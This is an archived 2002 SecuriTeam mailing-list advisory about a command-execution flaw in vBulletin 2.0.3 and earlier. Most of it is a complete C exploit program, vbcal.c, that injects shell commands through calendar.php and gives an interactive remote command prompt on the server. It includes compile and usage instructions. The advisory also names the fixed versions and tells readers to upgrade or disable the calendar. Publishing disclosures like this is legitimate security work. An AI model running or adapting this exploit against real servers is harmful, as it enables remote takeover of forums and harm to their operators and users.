[EXPL] vBulletin Calendar Improved Exploit Code
From: support@securiteam.com
Date: 11/17/02
- Previous message: support@securiteam.com: "[UNIX] Netscape/Mozilla Contains an Exploitable Heap Corruption via JAR URI Handler"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: 17 Nov 2002 19:17:43 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -
vBulletin Calendar Improved Exploit Code
------------------------------------------------------------------------
SUMMARY
An improved exploit code has been release for the vBulletin command
execution vulnerability, the improved exploit code supports Virtual Hosts,
automatic URL encoding, etc.
DETAILS
Vulnerable versions:
* vBulletin 2.0.3 and before
Immune versions:
* vBulletin 2.2.0 and later
Exploit:
/*
Program: vbcal.c
Original Date: 11-10-02
Version: 1.0
Platform: Linux (Compiled on SuSE 7.3 pro)
c0der: st0ic
Web: www.fsix.net
E-mail: st0ic@fsix.net
Revised:
None thus far
Description:
This is a proof of concept exploit which checks if a vBulletin
installation
is vulnerable to a security flaw in the calender.php script.
Vulnerable versions:
vBulletin 2.0.3 and before with the calendar option enabled and
a event on one of the dates.
Immune versions:
vBulletin 2.2.0 and later or any vBulletin with the calendar disabled.
Solution:
Upgrade to the newest vBulletin [http://www.vbulletin.com/] or disable
the calendar in vB's admin options.
Stuff:
gosper is credited with disclosing this to securiteam on 9-24-02 along
with a
working exploit and he probably discovered it too. I wrote this because
his
exploit didn't URL encode all the characters that needed to be URL encoded
in order for some of the inputted commands to work properly. I added a
date
argument which is essential for exploiting the security hole. I also used
an
fdopen() and fgets() to make sure all the output was recieved and
displayed
correctly, at least I hope it works better ;-). Last thing I built in was
HTTP
version 1.1 support so that you can use this against virtual hosts.
Yeah... and
you can exploit this with a web browser too, its just easier to use this
program,
most of the time.
Greetz to JadaCyrus, Terrorist, IreEnigma, badpack3t, biocenosis, ttye0,
End of Days, sk3tch and all the people in #ozane (www.ozane.net). If I
forgot you, well ***.
Compile: gcc vbcal.c -o vbcal
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#define url1 "calendar.php?calbirthdays=1&action=getday&day="
#define url2 "&comma=%22;echo%20'';%20echo%20%60"
#define url3 "%60;die();echo%22"
void time_out(void)
{
printf("\ntimed out on connect()\n");
exit(0);
}
void usage (char *prog)
{
printf("\n\t %s <-h host> <-d date> [-u url_path] [-p port] [-t timeout]
[-v (verbose)]\n\n", prog);
printf("\t The -h and -d arguments are required, the rest are
optional.");
printf("\n\t date takes the format Year-Month-Day: 2002-11-14 = Nov. 14
2002.");
printf("\n\t date must also be a date on the vBulletin board that has an
event on it.\n");
printf("\n\t **Note: if you get a HTML dump of a vBulletin page, you
probably used a date without an event on it.");
printf("\n\n\t Examples: %s -h 192.168.1.2 -d 2001-12-8", prog);
printf("\n\t %s -h 192.168.1.2 -d 2002-11-14 -u /forums/ -p 8080 -t
20 -v\n\n", prog);
exit(0);
}
int main(int argc, char *argv[])
{
int c, x, sockfd, verbose = 0;
int timeout = 10; /* timeout for connection */
int port = 80; /* 80 default for HTTPD */
char *path = "/"; /* url path, default = "/" */
char *host = NULL, *date = NULL;
char sign = '%';
char *prog;
char tmp[2];
char tmp2[4];
char cmd_buf[501];
char encoded_cmd[501];
char data[1024];
char output[20480]; /* 20k recv buf */
struct sockaddr_in addr;
struct hostent *he;
struct sigaction action;
FILE *f;
memset(&tmp, '\0', sizeof(tmp));
memset(&tmp2, '\0', sizeof(tmp2));
memset(&cmd_buf, '\0', sizeof(cmd_buf));
memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
memset(&data, '\0', sizeof(data));
memset(&output, '\0', sizeof(output));
prog = argv[0];
fprintf(stderr, "\t ---[ vb_cal.c\n");
fprintf(stderr, "\t ---[ vBulletin 2.0.3 and before Calendar
exploit\n");
fprintf(stderr, "\t ---[ c0ded by st0ic\n");
fprintf(stderr, "\t ---[ www.fsix.net\n");
if (argc < 5 || argc > 12)
usage(prog);
while ( (c = getopt(argc, argv, "h:d:u:p:t:v")) != -1 )
{
switch(c)
{
case 'h': /* host */
{
host = optarg;
break;
}
case 'd':
{
date = optarg;
break;
}
case 'u': /* url path */
{
path = optarg;
break;
}
case 'p': /* port */
{
port = atoi(optarg);
break;
}
case 't': /* connect timeout */
{
timeout = atoi(optarg);
break;
}
case 'v':
{
verbose = 1;
break;
}
default:
usage(prog);
}
}
/* make sure we got the required stuff */
if (host == NULL)
usage(prog);
else if (date == NULL)
usage(prog);
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}
if ( (he = gethostbyname(host)) == NULL)
{
perror("gethostbyname()");
exit(1);
}
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr = *( (struct in_addr *)he->h_addr);
addr.sin_port = htons(port);
bzero(&action, sizeof(action));
action.sa_handler = (void *)time_out;
action.sa_flags = 0;
sigaction(SIGALRM, &action, 0);
alarm(timeout);
if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
{
perror("connect()");
exit(1);
}
alarm(0);
printf("\\q to exit cmd prompt\n");
while(1)
{
printf("cmd> ");
fgets(cmd_buf, sizeof(cmd_buf), stdin);
for (x = 0; x < strlen(cmd_buf); x++)
if (cmd_buf[x] == '\n')
cmd_buf[x] = '\0';
if ( (cmd_buf[0] == '\\' && cmd_buf[1] == 'q') )
exit(0);
for (x = 0; x < strlen(cmd_buf); x++)
{
tmp[0] = cmd_buf[x];
/* 0 - 9 */
if ( (cmd_buf[x] >= 0 && cmd_buf[x] <= 9) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* A - Z */
else if ( (cmd_buf[x] >= 65 && cmd_buf[x] <= 90) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* a - z */
else if ( (cmd_buf[x] >= 97 && cmd_buf[x] <= 122) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* everything not a letter or number */
else
{
snprintf(tmp2, sizeof(tmp2), "%c%X", sign, cmd_buf[x]);
strncat(encoded_cmd, tmp2, sizeof(encoded_cmd));
}
}
/* use HTTP/1.1 in order to send valid HTTP commands to virtual hosts
*/
snprintf(data, sizeof(data), "GET %s%s%s%s%s%s HTTP/1.1\nHost:
%s\n\n", path, url1,
date, url2, encoded_cmd, url3, host);
/* be verbose about the string we're sending in case we need to debug.
*/
if (verbose == 1)
printf("\nSending: %s", data);
send(sockfd, data, sizeof(data), 0);
if ( (f = fdopen(sockfd, "r+") ) == NULL)
{
perror("fdopen()");
exit(1);
}
while(1)
{
fgets(output, sizeof(output), f);
if (feof(f) != 0)
break;
else
printf("%s", output);
memset(&output, '\0', sizeof(output));
}
memset(&cmd_buf, '\0', sizeof(cmd_buf));
memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
memset(&data, '\0', sizeof(data));
memset(&output, '\0', sizeof(output));
fclose(f);
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}
alarm(timeout);
if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
{
perror("connect()");
exit(1);
}
alarm(0);
}
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:st0ic@fsix.net> st0ic.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Next message: support@securiteam.com: "[UNIX] Code Injection in phpBB Advanced Quick Reply Mod"
- Previous message: support@securiteam.com: "[UNIX] Netscape/Mozilla Contains an Exploitable Heap Corruption via JAR URI Handler"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [BuHa-Security] Multiple vulnerabilities in (admincp/modcp of) vBulletin 3.0.8/9
... We sent them a mail with a list of security issues and they ... This issue is
not addressed in vBulletin 3.0.9. ... There are still a lot of security related bugs
in the administrator ... suggestions or criticism about the advisory feel ... (Bugtraq) - [NEWS] Additional Details Released on PHP Security Vulnerability in Multipart FORM Data Handling
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Vulnerability in Multipart
FORM Data Handling, ... PHP would allow attackers to cause the product to execute arbitrary
code. ... uninitialised struct is appended to a linked list of mime headers. ...
(Securiteam) - [BuHa-Security] Multiple vulnerabilities in (admincp/modcp of) vBulletin 3.0.7
... The vBulletin team released version 3.0.8 of their software at the same ...
time as we dropped them a mail about several security related issues. ... An authorized
user could elevate his privileges ... (Bugtraq) - [UNIX] vBulletin Information Disclosure (backup.php)
... Get your security news from a reliable source. ... the backup mechanism
allows users to obtain SQL dumps of vBulletin. ... vBULLETIN All Versions Forums Backup
Detector # ... (Securiteam) - SecurityFocus Microsoft Newsletter #165
... Tenable Security ... distribute, manage, and communicate vulnerability
and intrusion detection ... Microsoft Internet Explorer MHTML Forced File Execution Vuln...
... (Focus-Microsoft)
